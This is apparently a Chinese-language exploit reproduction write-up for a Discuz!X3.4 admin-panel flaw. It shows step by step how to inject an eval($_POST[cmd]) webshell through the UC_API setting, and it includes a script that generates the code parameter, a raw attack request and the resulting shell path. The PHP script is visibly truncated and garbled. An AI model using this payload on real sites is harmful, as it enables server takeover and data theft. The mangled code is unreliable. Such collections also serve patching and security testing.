# Discuz!X3.4 后台修改UCenter配置getshell漏洞 ## 漏洞复现 漏洞利用流程如下: 1. 进入后台`站长`-`UCenter设置`,修改UCenter通信密钥为`123456`。 2. 修改UC_API=`http://your-ip/discuz!x3.4/uc_server');eval($_POST[cmd]);//`,点击保存。 3. 利用UC_KEY(dz) 生成code参数,执行脚本`php ucode.php`生成code。 4. Burpsuite带code参数发送GET请求,结果为1表示成功。 ![img](images/1589986439989.png) 生成code参数的脚本 ucode.php: ```php 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) { return substr($result, 26); } else { return ''; } } else { return $keyc.str_replace('=', '', base64_encode($result)); } } ?> ``` 带code参数发送GET请求: ![img](images/1589987534699.png) 请求数据包: ``` GET /discuz!x3.4/api/uc.php?code=ac7091oTLALD6X24gZeiX5YmqDkLnX4ivIqx1jDnA7NhUAcHHOX3fWWOLWpGwSwfQfz4r5Pgf86bRlDTRkQ% HTTP/1.1 Host: your-ip Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,ar;q=0.8 Connection: close Content-Length: 133 http://your-ip/discuz!x3.4/uc_server ``` Shell 地址: ``` http://your-ip/discuz!x3.4/config/config_ucenter.php ```